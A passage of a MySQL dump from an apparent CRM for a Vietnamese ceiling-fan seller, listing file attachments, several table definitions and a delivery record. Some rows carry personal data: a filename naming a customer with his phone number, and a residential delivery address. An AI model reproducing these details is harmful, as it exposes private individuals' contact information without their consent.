(89, 1803, 'commodity_item_file', 'zini_witcrm_s10.jpg', 'image/jpeg', 0, '70a8188a0f019c6a91ec3027abd72da5', NULL, NULL, NULL, 1, 0, 0, '2022-01-11 12:21:50'),
(90, 1802, 'commodity_item_file', 'zini_witcrm_s10.jpg', 'image/jpeg', 0, 'd438367eb04b970fdcfd9a70b268d3b6', NULL, NULL, NULL, 1, 0, 0, '2022-01-11 12:22:03'),
(91, 1801, 'commodity_item_file', 'zini_witcrm_s10.jpg', 'image/jpeg', 0, 'b1d5bfeb29ffb7dbaa46e0878e10472b', NULL, NULL, NULL, 1, 0, 0, '2022-01-11 12:22:15'),
(92, 1800, 'commodity_item_file', 'zini_witcrm_s10.jpg', 'image/jpeg', 0, 'c44258940f56b387d52274037e84932c', NULL, NULL, NULL, 1, 0, 0, '2022-01-11 12:22:29'),
(93, 1799, 'commodity_item_file', 'zini_witcrm_s10.jpg', 'image/jpeg', 0, '0d1efcd7407bec7414cc3cd1a392bc6f', NULL, NULL, NULL, 1, 0, 0, '2022-01-11 12:22:40'),
(94, 1798, 'commodity_item_file', 'zini_witcrm_dc5.jpg', 'image/jpeg', 0, '6b2c8e8c2df96779e2f9a1868a3f4ea2', NULL, NULL, NULL, 1, 0, 0, '2022-01-11 12:24:30'),
(95, 1797, 'commodity_item_file', 'zini_witcrm_dc5.jpg', 'image/jpeg', 0, '01c88b15d06254a71a6354cdc40d29d9', NULL, NULL, NULL, 1, 0, 0, '2022-01-11 12:24:38'),
(96, 1796, 'commodity_item_file', 'zini_witcrm_ac3.jpg', 'image/jpeg', 0, '67a9cc5baa39e679faf625dad2225f27', NULL, NULL, NULL, 1, 0, 0, '2022-01-11 12:25:28'),
(97, 1795, 'commodity_item_file', 'zini_witcrm_dc6.jpg', 'image/jpeg', 0, '01752dc90b081cf8c901f80b23a3edd5', NULL, NULL, NULL, 1, 0, 0, '2022-01-11 12:25:38'),
(98, 1794, 'commodity_item_file', 'zini_witcrm_wc6.jpg', 'image/jpeg', 0, '61abfc2707c19132ff7dfc30df3065f3', NULL, NULL, NULL, 1, 0, 0, '2022-01-11 12:26:09'),
(99, 1793, 'commodity_item_file', 'zini_witcrm_wc6.jpg', 'image/jpeg', 0, '3ea8fd51c5752324b7d2e7ddf3afb337', NULL, NULL, NULL, 1, 0, 0, '2022-01-11 12:26:20'),
(100, 1792, 'commodity_item_file', 'zini_witcrm_wc_ha.jpg', 'image/jpeg', 0, '3008bb0d8e07548b607087d55bf167b6', NULL, NULL, NULL, 1, 0, 0, '2022-01-11 12:27:19'),
(101, 1791, 'commodity_item_file', 'zini_witcrm_rm_ha.jpg', 'image/jpeg', 0, '328a6da3ea0d048461d10f7edb1c2249', NULL, NULL, NULL, 1, 0, 0, '2022-01-11 12:27:32'),
(102, 1790, 'commodity_item_file', 'zini_witcrm_haikL-r.jpg', 'image/jpeg', 0, '9615b004438c68b7455e9dab01241355', NULL, NULL, NULL, 1, 0, 0, '2022-01-11 12:27:47'),
(103, 1781, 'commodity_item_file', 'zini_witcrm_essence.jpg', 'image/jpeg', 0, '7adc5ca24fff684416a098d8fadf1d11', NULL, NULL, NULL, 1, 0, 0, '2022-01-11 12:28:00'),
(104, 1780, 'commodity_item_file', 'zini_witcrm_pf8.jpg', 'image/jpeg', 0, '91ca0c9daaf5f736a771060ef0c3fdc2', NULL, NULL, NULL, 1, 0, 0, '2022-01-11 12:28:10'),
(105, 1904, 'commodity_item_file', 'zini_witcrm_008C.jpg', 'image/jpeg', 0, '1d7d6af9a18f69ee34472456d87345c6', NULL, NULL, NULL, 1, 0, 0, '2022-01-11 13:13:16'),
(106, 1896, 'commodity_item_file', 'zini_witcrm_saba_black.jpg', 'image/jpeg', 0, 'e1bbc01f1a2691623b2d0f53fe5ce5ce', NULL, NULL, NULL, 1, 0, 0, '2022-01-11 13:15:45'),
(107, 1871, 'commodity_item_file', 'zini_witcrm_pica.jpg', 'image/jpeg', 0, '527cd1eaff85b90105834f1a2e08eb95', NULL, NULL, NULL, 1, 0, 0, '2022-01-11 13:18:31'),
(108, 1870, 'commodity_item_file', 'zini_witcrm_crance.jpg', 'image/jpeg', 0, '74ae8d2e553b659946eafdadf445b15c', NULL, NULL, NULL, 1, 0, 0, '2022-01-11 13:18:47'),
(109, 1865, 'commodity_item_file', 'zini_witcrm_akmani_bn_led.jpg', 'image/jpeg', 0, '1f3f7d63ce8115e690bf5b121a12b367', NULL, NULL, NULL, 1, 0, 0, '2022-01-11 13:18:59'),
(110, 1858, 'commodity_item_file', 'zini_witcrm_IRIS60.jpg', 'image/jpeg', 0, 'b4c578e8024722bb1781468aa9f49be8', NULL, NULL, NULL, 1, 0, 0, '2022-01-11 13:19:18'),
(111, 1839, 'commodity_item_file', 'zini_witcrm_santin.jpg', 'image/jpeg', 0, '83c4a78e27204b4df0026e88e12b0646', NULL, NULL, NULL, 1, 0, 0, '2022-01-11 13:20:05'),
(112, 1838, 'commodity_item_file', 'zini_witcrm_bn.jpg', 'image/jpeg', 0, 'ffe7cbdb144ef0af8e890ec5e1a6700a', NULL, NULL, NULL, 1, 0, 0, '2022-01-11 13:20:58'),
(113, 1835, 'commodity_item_file', 'zini_witcrm_84_b.jpg', 'image/jpeg', 0, '230d8ea8dc7d42ac9da36267e5409191', NULL, NULL, NULL, 1, 0, 0, '2022-01-11 13:22:16'),
(114, 1867, 'commodity_item_file', 'zini_witcrm_akmani_bn-n.jpg', 'image/jpeg', 0, '2ed240713252a8f137d75a34208aa458', NULL, NULL, NULL, 1, 0, 0, '2022-01-11 13:23:12'),
(115, 1789, 'commodity_item_file', 'zini_witcrm_baf.jpg', 'image/jpeg', 0, '7996f43164959ae10fcd08093a9ed924', NULL, NULL, NULL, 1, 0, 0, '2022-01-11 13:26:56'),
(116, 1786, 'commodity_item_file', 'zini_witcrm_wc_Pfx.jpg', 'image/jpeg', 0, 'b2ef85e434319f72f28c369d3c780af2', NULL, NULL, NULL, 1, 0, 0, '2022-01-11 13:27:15'),
(117, 1787, 'commodity_item_file', 'detx.jpg', 'image/jpeg', 0, 'fbf03d71068f275a647b822365d6a31f', NULL, NULL, NULL, 1, 0, 0, '2022-01-11 13:27:24'),
(118, 1788, 'commodity_item_file', 'zini_witcrm_worrk.jpg', 'image/jpeg', 0, '35fdd181b65ee8c1c5ba819bd36166e6', NULL, NULL, NULL, 1, 0, 0, '2022-01-11 13:27:37'),
(119, 1783, 'commodity_item_file', 'zini_witcrm_wc-essence.jpg', 'image/jpeg', 0, '3dce871c419e7b97ee9bdc264651efc3', NULL, NULL, NULL, 1, 0, 0, '2022-01-11 13:27:51'),
(120, 1782, 'commodity_item_file', 'zini_witcrm_wc_ha.jpg', 'image/jpeg', 0, '3d03484315de951c6822d5ee17bec658', NULL, NULL, NULL, 1, 0, 0, '2022-01-11 13:28:03'),
(121, 1779, 'commodity_item_file', 'zini_witcrm_pf8.jpg', 'image/jpeg', 0, 'be6cbe07e4dffb9b870650370211d28e', NULL, NULL, NULL, 1, 0, 0, '2022-01-11 13:28:23'),
(122, 1743, 'commodity_item_file', 'zini_witcrm_pivot.jpg', 'image/jpeg', 0, '797ba0ad1dd5940f55c8b6d20e56c01a', NULL, NULL, NULL, 1, 0, 0, '2022-01-11 13:28:42'),
(123, 1744, 'commodity_item_file', 'zini_witcrm_sidekick.jpg', 'image/jpeg', 0, 'ddf15d62151d00ed6958d588e2f09944', NULL, NULL, NULL, 1, 0, 0, '2022-01-11 13:28:53'),
(124, 1741, 'commodity_item_file', 'zini_witcrm_aireye.jpg', 'image/jpeg', 0, '8d3e09e0ca2064dca97355db947c2b0a', NULL, NULL, NULL, 1, 0, 0, '2022-01-11 13:29:05'),
(125, 1745, 'commodity_item_file', 'zini_witcrm_airgo.jpg', 'image/jpeg', 0, 'b75f9dfe8ccd7835c7e69c235b5c0d45', NULL, NULL, NULL, 1, 0, 0, '2022-01-11 13:29:20'),
(126, 1746, 'commodity_item_file', 'zini_witcrm_blackJac.jpg', 'image/jpeg', 0, '777957ed2f13d9a33d9bca07041ceb71', NULL, NULL, NULL, 1, 0, 0, '2022-01-11 13:29:31'),
(142, 5, 'credit_note', 'THANH TOAN DOT 1.jpg', 'image/jpeg', 0, '79229e0c6570c3cb72d8b91f58620b14', NULL, NULL, NULL, 1, 0, 0, '2022-01-17 10:05:02'),
(143, 756, 'customer', 'BGQT Mr. Khánh - 0903676464 _ Onix-Sino_09.2021.pdf', 'application/pdf', 0, '211dc305b4102752ea2608d37814e67c', NULL, NULL, NULL, 1, 0, 0, '2022-01-17 10:20:44'),
(144, 756, 'customer', 'BGQT Mr. Khánh - 0903676464 _ Onix-Sino_09.2021.xls', 'application/vnd.ms-excel', 0, 'cb926bdf8f6bb7ce78964e49ee0548e9', NULL, NULL, NULL, 1, 0, 0, '2022-01-17 10:20:44'),
(153, 1930, 'commodity_item_file', 'zini_witcrm_nevis93_koa.jpg', 'image/jpeg', 0, '76bca9614f8bb0e82316ab466bf9df86', NULL, NULL, NULL, 1, 0, 0, '2022-01-18 09:59:26'),
(154, 1931, 'commodity_item_file', 'zini_witcrm_nevis-s.jpg', 'image/jpeg', 0, 'fcff8e0b493895f2880150e94dad7b36', NULL, NULL, NULL, 1, 0, 0, '2022-01-18 10:00:56'),
(155, 1928, 'commodity_item_file', 'zini_witcrm_dieukhien.jpg', 'image/jpeg', 0, 'eebf0a59ac9bd14803109b96ba17f47d', NULL, NULL, NULL, 1, 0, 0, '2022-01-18 10:03:02'),
(156, 1902, 'commodity_item_file', 'zini_witcrm_812.jpg', 'image/jpeg', 0, 'be3718e5f36e33b82146e5364c1df969', NULL, NULL, NULL, 1, 0, 0, '2022-01-18 10:07:38'),
(157, 1868, 'commodity_item_file', 'zini_witcrm_HAMACHI.jpg', 'image/jpeg', 0, 'b897025e26cfa5cdb4b0967c06e7b5d4', NULL, NULL, NULL, 1, 0, 0, '2022-01-18 10:09:12'),
(228, 8, 'estimate_request', 'QUOTE 00767134.pdf', 'application/pdf', 0, '7cc4d7e783eb3073975ce65f9f82b93a', NULL, NULL, NULL, 1, 0, 0, '2022-03-12 12:19:07'),
(230, 10, 'estimate_request', '480891224_HomeDepot_L52_Caramel_White.jpg', 'image/jpeg', 0, 'a953ac9176d3ace932eb4bd8ee7f9c12', NULL, NULL, NULL, 0, 0, 0, '2022-03-16 15:25:55'),
(233, 756, 'customer', 'Hoan tra tien hang anh Khanh.pdf', 'application/pdf', 0, '5c0587a38c042227094efc66f9e0ae60', NULL, NULL, NULL, 1, 0, 0, '2022-03-22 12:18:40'),
(244, 75, 'invoice', 'Xác nhận thanh toán Anh Đông.jpg', 'image/jpeg', 0, '99b8f86dfa29a25509eaa1a67dbffa64', NULL, NULL, NULL, 1, 0, 0, '2022-04-02 10:34:57'),
(253, 1938, 'commodity_item_file', 'den-led-tobago.jpg', 'image/jpeg', 0, '5beb5a3501d4e018d160754f5a260f7d', NULL, NULL, NULL, 1, 0, 0, '2022-04-17 11:06:30'),
(254, 6, 'pur_vendor', '4a58e4d96287a3d9fa96.jpg', 'image/jpeg', 0, '252a214e0cbbc8439a02e35e152d67a1', NULL, NULL, NULL, 1, 0, 0, '2022-04-27 09:40:10'),
(255, 6, 'pur_vendor', 'fd07d72b99f757a90ee6.jpg', 'image/jpeg', 0, '68b5090ef2b7c9399d44453e1eab3194', NULL, NULL, NULL, 1, 0, 0, '2022-04-27 09:40:17'),
(256, 16, 'estimate_request', 'AMATECH黑版型錄-英文3.5代黑版-220119_小_-12.pdf', 'application/pdf', 0, '227ec31878b08c43db959d083b1633b7', NULL, NULL, NULL, 0, 0, 0, '2022-05-05 09:31:21'),
(257, 17, 'estimate_request', 'image.jpg', 'image/jpeg', 0, '16ea566cbcfa20c9610889be04184fdd', NULL, NULL, NULL, 0, 0, 0, '2022-05-06 08:24:56'),
(260, 18, 'estimate_request', 'YCBG THIET BI REAL 190522.xlsx', 'application/vnd.openxmlformats-officedoc', 0, 'ab93c5ec251069fd9944ed0549568a96', NULL, NULL, NULL, 0, 0, 0, '2022-05-19 15:02:26'),
(264, 21, 'estimate_request', 'favicon-32x32.png', 'image/png', 0, 'ae75c8adc76f2fb4e08e94795a882a07', NULL, NULL, NULL, 0, 0, 0, '2022-06-21 10:13:45'),
(265, 21, 'estimate_request', 'favicon-96x96.png', 'image/png', 0, 'c1514dec1990f035a5ce70ef646ddebb', NULL, NULL, NULL, 0, 0, 0, '2022-06-21 10:13:45'),
(266, 21, 'estimate_request', 'ms-icon-310x310.png', 'image/png', 0, 'd5849e587fc563da5ac8e1e72d6ebd33', NULL, NULL, NULL, 0, 0, 0, '2022-06-21 10:13:45'),
(267, 21, 'estimate_request', 'android-icon-36x36.png', 'image/png', 0, '141b6c3741c492172c314272f3830bf2', NULL, NULL, NULL, 0, 0, 0, '2022-06-21 10:13:45'),
(268, 21, 'estimate_request', 'android-icon-48x48.png', 'image/png', 0, '8b381acefca6e0b61e75e3a2b4c6e740', NULL, NULL, NULL, 0, 0, 0, '2022-06-21 10:13:45'),
(269, 21, 'estimate_request', 'android-icon-72x72.png', 'image/png', 0, '296103a1aed9247aacf19889eabcb4ff', NULL, NULL, NULL, 0, 0, 0, '2022-06-21 10:13:45'),
(270, 21, 'estimate_request', 'android-icon-96x96.png', 'image/png', 0, '55d89601cc2e19e481be40bf6a15aa7a', NULL, NULL, NULL, 0, 0, 0, '2022-06-21 10:13:45'),
(271, 21, 'estimate_request', 'android-icon-144x144.png', 'image/png', 0, '68ed3f9480a81258aaeac243fb7e81c5', NULL, NULL, NULL, 0, 0, 0, '2022-06-21 10:13:45'),
(272, 21, 'estimate_request', 'android-icon-192x192.png', 'image/png', 0, '4e2c3e0967ea5bfdc7b7a93f3f2e6b97', NULL, NULL, NULL, 0, 0, 0, '2022-06-21 10:13:45'),
(273, 21, 'estimate_request', 'apple-icon-57x57.png', 'image/png', 0, '8ce92ad004a7d83252c0b38414669d12', NULL, NULL, NULL, 0, 0, 0, '2022-06-21 10:13:45'),
(274, 21, 'estimate_request', 'apple-icon-60x60.png', 'image/png', 0, '8e85305d24dc3d11e914545e6bc918e6', NULL, NULL, NULL, 0, 0, 0, '2022-06-21 10:13:45'),
(275, 21, 'estimate_request', 'apple-icon-72x72.png', 'image/png', 0, '661ee902a071e221ceb51afb2cdb78f9', NULL, NULL, NULL, 0, 0, 0, '2022-06-21 10:13:45'),
(276, 21, 'estimate_request', 'apple-icon-76x76.png', 'image/png', 0, '608c6743b365fb8be46df575b24ba309', NULL, NULL, NULL, 0, 0, 0, '2022-06-21 10:13:45'),
(277, 21, 'estimate_request', 'apple-icon-114x114.png', 'image/png', 0, '003f617d7d795b12703fe9d9c5cfc9c5', NULL, NULL, NULL, 0, 0, 0, '2022-06-21 10:13:45'),
(278, 21, 'estimate_request', 'apple-icon-120x120.png', 'image/png', 0, '4f13abae4ea2841cd3c1531c9c621415', NULL, NULL, NULL, 0, 0, 0, '2022-06-21 10:13:45'),
(279, 21, 'estimate_request', 'apple-icon-144x144.png', 'image/png', 0, '71b7df9d62adea48be8e8cd5016ae47c', NULL, NULL, NULL, 0, 0, 0, '2022-06-21 10:13:45'),
(280, 21, 'estimate_request', 'apple-icon-152x152.png', 'image/png', 0, 'c2cce500bdee7c184984ddb294c8a0ac', NULL, NULL, NULL, 0, 0, 0, '2022-06-21 10:13:45'),
(281, 21, 'estimate_request', 'apple-icon-180x180.png', 'image/png', 0, '307171efde2ddd3883c83091f65942ca', NULL, NULL, NULL, 0, 0, 0, '2022-06-21 10:13:45'),
(284, 1869, 'commodity_item_file', 'Hamachi_led_CRM.jpg', 'image/jpeg', 0, '84fa5fae2110e9c0e16ecd35acacf120', NULL, NULL, NULL, 1, 0, 0, '2022-06-30 20:00:56'),
(285, 26, 'estimate_request', 'quat-tran-3-canh-go-pearl-60.png', 'image/png', 0, '51bb00702562a35a0cdb4ce228d1a49d', NULL, NULL, NULL, 0, 0, 0, '2022-07-28 08:12:30'),
(286, 1940, 'commodity_item_file', 'katrina_52-maple.jpg', 'image/jpeg', 0, '5bcb7104e4516bfe481a483e92454c37', NULL, NULL, NULL, 1, 0, 0, '2022-08-01 09:22:46'),
(287, 1942, 'commodity_item_file', 'abacus_matt_white.jpg', 'image/jpeg', 0, 'c4ca397eadb4e491bdfe4a292651dcea', NULL, NULL, NULL, 1, 0, 0, '2022-08-01 09:42:09'),
(288, 1882, 'commodity_item_file', 'Pearl_B.jpg', 'image/jpeg', 0, '26b058f2220c61ecbcda7f639e8b6ec3', NULL, NULL, NULL, 1, 0, 0, '2022-08-01 09:45:53'),
(289, 1882, 'commodity_item_file', 'pearl6-dark.jpg', 'image/jpeg', 0, 'ab08171c1ad14b31a221b912d10fd838', NULL, NULL, NULL, 1, 0, 0, '2022-08-01 09:45:53'),
(290, 1897, 'commodity_item_file', 'tobago_black.jpg', 'image/jpeg', 0, '3120343541e48a4afe828707e4536476', NULL, NULL, NULL, 1, 0, 0, '2022-08-01 09:46:17'),
(292, 1940, 'commodity_item_file', 'katrina_maple.jpg', 'image/jpeg', 0, '86fcad1453caba296f16e9c38829d0cf', NULL, NULL, NULL, 1, 0, 0, '2022-08-01 09:48:16'),
(300, 1943, 'commodity_item_file', 'katrina_crm.jpg', 'image/jpeg', 0, '141ee635a926cc229b5c463c82c9a52d', NULL, NULL, NULL, 1, 0, 0, '2022-09-15 08:16:37'),
(301, 1944, 'commodity_item_file', 'abacus60-black.jpg', 'image/jpeg', 0, 'a4a379d535a581dd8a06e30facb48934', NULL, NULL, NULL, 1, 0, 0, '2022-09-15 08:18:18'),
(302, 1945, 'commodity_item_file', 'tytreo_crm.jpg', 'image/jpeg', 0, 'c28e6e60803cac0d6e11fa63303492d7', NULL, NULL, NULL, 1, 0, 0, '2022-09-15 11:08:20'),
(304, 32, 'estimate_request', 'cutsheet-sidekick (1).pdf', 'application/pdf', 0, 'b5f76c7410a39a4f52bea4786cf96af1', NULL, NULL, NULL, 1, 0, 0, '2022-09-18 07:40:00'),
(305, 32, 'estimate_request', 'BAF_PT_Energy Brochure_03-29-2022.pdf', 'application/pdf', 0, 'd646bfb944449739aa282498d0b6db40', NULL, NULL, NULL, 1, 0, 0, '2022-09-18 07:40:00'),
(306, 32, 'estimate_request', 'INV-178-22 (1).pdf', 'application/pdf', 0, 'e947100329bd50e7542e6e66b0d7e4b3', NULL, NULL, NULL, 1, 0, 0, '2022-09-18 07:40:00'),
(307, 32, 'estimate_request', 'INV-178-22.pdf', 'application/pdf', 0, 'eed05070807ed7e6d875dd7473fade7a', NULL, NULL, NULL, 1, 0, 0, '2022-09-18 07:40:00'),
(313, 34, 'estimate_request', '20221006_150113.jpg', 'image/jpeg', 0, '9907f28b2b514b58acfab08ff23b6303', NULL, NULL, NULL, 0, 0, 0, '2022-10-08 16:32:55'),
(314, 35, 'estimate_request', 'haiku_h_series_ceiling_fan_52_cocoa_bamboo_low_profile_mount_black_1_2.jpg', 'image/jpeg', 0, '8e82fe7eca528fa37854597cb2c150ba', NULL, NULL, NULL, 0, 0, 0, '2022-10-26 16:59:18'),
(315, 36, 'estimate_request', '0B44B03C-2406-482B-82BA-6D63E69B8523.jpeg', 'image/jpeg', 0, '8168353730545bd19ebd761d38fbce6e', NULL, NULL, NULL, 0, 0, 0, '2022-11-12 20:55:40'),
(316, 2, 'expense', '20221112_114635.jpg', 'image/jpeg', 0, 'e9274b8f2b1b6abe886c6f2483232064', NULL, NULL, NULL, 1, 0, 0, '2022-11-13 13:03:16'),
(318, 37, 'estimate_request', '16693786059796195655383594367651.jpg', 'image/jpeg', 0, 'c49370fc5276136dccfb5642226fa5ab', NULL, NULL, NULL, 0, 0, 0, '2022-11-25 19:17:00'),
(323, 40, 'estimate_request', 'JTEC_FAN.pdf', 'application/pdf', 0, '0a2d7a7c138bcf1bf5f88c7f92e2dcd5', NULL, NULL, NULL, 0, 0, 0, '2023-01-31 16:51:47'),
(324, 41, 'estimate_request', 'MELODY LOGISTICS PROFILE.pdf', 'application/pdf', 0, '770705882bfafe20125c8e4b65150ecf', NULL, NULL, NULL, 0, 0, 0, '2023-02-06 14:55:45'),
(325, 2, 'ma_asset', 'J003167_BAF - Haiku Asia Brochure 6pp DIGITAL ART1.pdf', 'application/pdf', 0, 'aa6eec4c5d55ceba77712c4013f3a153', NULL, NULL, NULL, 1, 0, 0, '2023-02-23 11:03:48'),
(326, 3, 'ma_asset', 'Hamilton_Air_Catalogue_2021_NEW.pdf', 'application/pdf', 0, '96cc2f6a6400b9eaf580986335959035', NULL, NULL, NULL, 1, 0, 0, '2023-02-25 07:59:58'),
(333, 53, 'estimate_request', 'cutsheet-powerfoilx3.pdf', 'application/pdf', 0, '2339e55eae4fdb61a98cf7b51b94c917', NULL, NULL, NULL, 1, 0, 0, '2023-03-31 10:29:12'),
(334, 305, 'lead', 'my_odessa.pdf', 'application/pdf', 0, '7e9c662fbfbe1ddbfb5c5c8bca832d57', NULL, NULL, NULL, 0, 0, 0, '2023-04-24 02:23:42'),
(336, 307, 'lead', 'my_odessa.pdf', 'application/pdf', 0, '1e98d3bfa5a4bbbd84612f91def4bfaa', NULL, NULL, NULL, 0, 0, 0, '2023-04-24 06:40:46'),
(337, 54, 'estimate_request', 'SUMMARY TABLE.xlsx', 'application/vnd.openxmlformats-officedoc', 0, 'd0bd5479d8ed0ff66482fb6f6e968eea', NULL, NULL, NULL, 0, 0, 0, '2023-05-05 10:19:21'),
(345, 62, 'estimate_request', 'cutsheet-haiku-outdoor-sg (2).pdf', 'application/pdf', 0, '07c0e3d8f62b1bcac8ce790117e61b7e', NULL, NULL, NULL, 0, 0, 0, '2023-06-13 14:46:26'),
(346, 317, 'lead', 'z4614972908677_fbee130468e09b8fb2b14a01ccd42416.jpg', 'image/jpeg', 0, 'a65da7c2def5c4df20a6c13fb1a9f58b', NULL, NULL, NULL, 0, 0, 0, '2023-08-18 16:13:42'),
(347, 1, 'card_picture', 'wh_modern_hvls.jpg', 'image/jpeg', 0, 'c0b34caaffb8397c494710eb8eb6a9f3', NULL, NULL, NULL, 1, 0, 0, '2023-09-16 06:37:45'),
(348, 1925, 'commodity_item_file', 'thumb_lap_dat.jpg', 'image/jpeg', 0, 'e67e41b13524c7fcb2392058ee05ab47', NULL, NULL, NULL, 1, 0, 0, '2023-10-07 14:36:05'),
(349, 1924, 'commodity_item_file', 'thumb_lap_dat.jpg', 'image/jpeg', 0, '6859658635c152e3e5260d9fb5977205', NULL, NULL, NULL, 1, 0, 0, '2023-10-07 14:36:14'),
(350, 1932, 'commodity_item_file', 'thumb_lap_dat.jpg', 'image/jpeg', 0, '0c2d1cf25957c0264838effd8dee6bbc', NULL, NULL, NULL, 1, 0, 0, '2023-10-07 14:36:31'),
(351, 325, 'lead', 'IMG_20231010_205102.jpg', 'image/jpeg', 0, 'be972414fef815f7e53904af0852869c', NULL, NULL, NULL, 0, 0, 0, '2023-10-11 08:38:33'),
(359, 326, 'lead', '898D8BAE-A632-44DD-9571-AF28CBFF93DE.png', 'image/png', 0, '6d51b87931aa27a5a04c43f98108760b', NULL, NULL, NULL, 0, 0, 0, '2023-12-12 11:11:50'),
(361, 1968, 'commodity_item_file', 'ruckus.jpg', 'image/jpeg', 0, '67ce159b94bf61ad3b00f721171ec119', NULL, NULL, NULL, 1, 0, 0, '2024-01-26 14:34:52');

-- --------------------------------------------------------

--
-- Table structure for table `tblfilters`
--

CREATE TABLE `tblfilters` (
  `id` int(10) UNSIGNED NOT NULL,
  `name` varchar(191) NOT NULL,
  `builder` mediumtext NOT NULL,
  `staff_id` int(10) UNSIGNED NOT NULL,
  `identifier` varchar(191) NOT NULL,
  `is_shared` tinyint(3) UNSIGNED NOT NULL DEFAULT 0
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;

-- --------------------------------------------------------

--
-- Table structure for table `tblform_questions`
--

CREATE TABLE `tblform_questions` (
  `questionid` int(11) NOT NULL,
  `rel_id` int(11) NOT NULL,
  `rel_type` varchar(20) DEFAULT NULL,
  `question` mediumtext NOT NULL,
  `required` tinyint(1) NOT NULL DEFAULT 0,
  `question_order` int(11) NOT NULL
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_general_ci;

-- --------------------------------------------------------

--
-- Table structure for table `tblform_question_box`
--

CREATE TABLE `tblform_question_box` (
  `boxid` int(11) NOT NULL,
  `boxtype` varchar(10) NOT NULL,
  `questionid` int(11) NOT NULL
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_general_ci;

-- --------------------------------------------------------

--
-- Table structure for table `tblform_question_box_description`
--

CREATE TABLE `tblform_question_box_description` (
  `questionboxdescriptionid` int(11) NOT NULL,
  `description` mediumtext NOT NULL,
  `boxid` mediumtext NOT NULL,
  `questionid` int(11) NOT NULL
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_general_ci;

-- --------------------------------------------------------

--
-- Table structure for table `tblform_results`
--

CREATE TABLE `tblform_results` (
  `resultid` int(11) NOT NULL,
  `boxid` int(11) NOT NULL,
  `boxdescriptionid` int(11) DEFAULT NULL,
  `rel_id` int(11) NOT NULL,
  `rel_type` varchar(20) DEFAULT NULL,
  `questionid` int(11) NOT NULL,
  `answer` text DEFAULT NULL,
  `resultsetid` int(11) NOT NULL
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_general_ci;

-- --------------------------------------------------------

--
-- Table structure for table `tblgdpr_requests`
--

CREATE TABLE `tblgdpr_requests` (
  `id` int(11) NOT NULL,
  `clientid` int(11) NOT NULL DEFAULT 0,
  `contact_id` int(11) NOT NULL DEFAULT 0,
  `lead_id` int(11) NOT NULL DEFAULT 0,
  `request_type` varchar(191) DEFAULT NULL,
  `status` varchar(40) DEFAULT NULL,
  `request_date` datetime NOT NULL,
  `request_from` varchar(150) DEFAULT NULL,
  `description` text DEFAULT NULL
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_general_ci;

-- --------------------------------------------------------

--
-- Table structure for table `tblgoals`
--

CREATE TABLE `tblgoals` (
  `id` int(11) NOT NULL,
  `subject` varchar(191) NOT NULL,
  `description` text NOT NULL,
  `start_date` date NOT NULL,
  `end_date` date NOT NULL,
  `goal_type` int(11) NOT NULL,
  `contract_type` int(11) NOT NULL DEFAULT 0,
  `achievement` int(11) NOT NULL,
  `notify_when_fail` tinyint(1) NOT NULL DEFAULT 1,
  `notify_when_achieve` tinyint(1) NOT NULL DEFAULT 1,
  `notified` int(11) NOT NULL DEFAULT 0,
  `staff_id` int(11) NOT NULL DEFAULT 0
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_general_ci;

--
-- Dumping data for table `tblgoals`
--

INSERT INTO `tblgoals` (`id`, `subject`, `description`, `start_date`, `end_date`, `goal_type`, `contract_type`, `achievement`, `notify_when_fail`, `notify_when_achieve`, `notified`, `staff_id`) VALUES
(1, 'Chuyển KH tiềm năng', '', '2023-09-20', '2023-12-31', 2, 0, 0, 1, 1, 1, 0);

-- --------------------------------------------------------

--
-- Table structure for table `tblgoods_delivery`
--

CREATE TABLE `tblgoods_delivery` (
  `id` int(10) UNSIGNED NOT NULL,
  `rel_type` int(11) DEFAULT NULL COMMENT 'type goods delivery',
  `rel_document` int(11) DEFAULT NULL COMMENT 'document id of goods delivery',
  `customer_code` text DEFAULT NULL,
  `customer_name` varchar(100) DEFAULT NULL,
  `to_` varchar(100) DEFAULT NULL,
  `address` varchar(100) DEFAULT NULL,
  `description` text DEFAULT NULL COMMENT 'the reason delivery',
  `staff_id` int(11) DEFAULT NULL COMMENT 'salesman',
  `date_c` date DEFAULT NULL,
  `date_add` date DEFAULT NULL,
  `goods_delivery_code` varchar(100) DEFAULT NULL COMMENT 'số chứng từ xuất kho',
  `warehouse_id` int(11) DEFAULT NULL,
  `total_money` varchar(200) DEFAULT NULL,
  `approval` int(11) DEFAULT 0 COMMENT 'status approval ',
  `addedfrom` int(11) DEFAULT NULL,
  `total_discount` varchar(100) DEFAULT NULL,
  `after_discount` varchar(100) DEFAULT NULL,
  `invoice_id` varchar(100) DEFAULT NULL,
  `project` text DEFAULT NULL,
  `type` text DEFAULT NULL,
  `department` int(11) DEFAULT NULL,
  `requester` int(11) DEFAULT NULL,
  `invoice_no` text DEFAULT NULL,
  `pr_order_id` int(11) DEFAULT NULL,
  `shipping_fee` decimal(15,2) DEFAULT 0.00,
  `type_of_delivery` varchar(100) DEFAULT 'total',
  `additional_discount` decimal(15,2) DEFAULT 0.00,
  `sub_total` decimal(15,2) DEFAULT 0.00,
  `delivery_status` varchar(100) DEFAULT 'ready_for_packing'
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_general_ci;

--
-- Dumping data for table `tblgoods_delivery`
--

INSERT INTO `tblgoods_delivery` (`id`, `rel_type`, `rel_document`, `customer_code`, `customer_name`, `to_`, `address`, `description`, `staff_id`, `date_c`, `date_add`, `goods_delivery_code`, `warehouse_id`, `total_money`, `approval`, `addedfrom`, `total_discount`, `after_discount`, `invoice_id`, `project`, `type`, `department`, `requester`, `invoice_no`, `pr_order_id`, `shipping_fee`, `type_of_delivery`, `additional_discount`, `sub_total`, `delivery_status`) VALUES
(1, NULL, NULL, '1436', NULL, NULL, 'A2-25 Mỹ Gia 2, Phú Mỹ Hưng, Quận 7, Tp. HCM', '', 17, '2024-01-26', '2024-01-26', 'XK384', NULL, '12000000', 1, 17, NULL, '12000000', '393', NULL, NULL, NULL, NULL, 'INV-383-24', NULL, 0.00, 'total', 0.00, 0.00, 'ready_for_packing'),
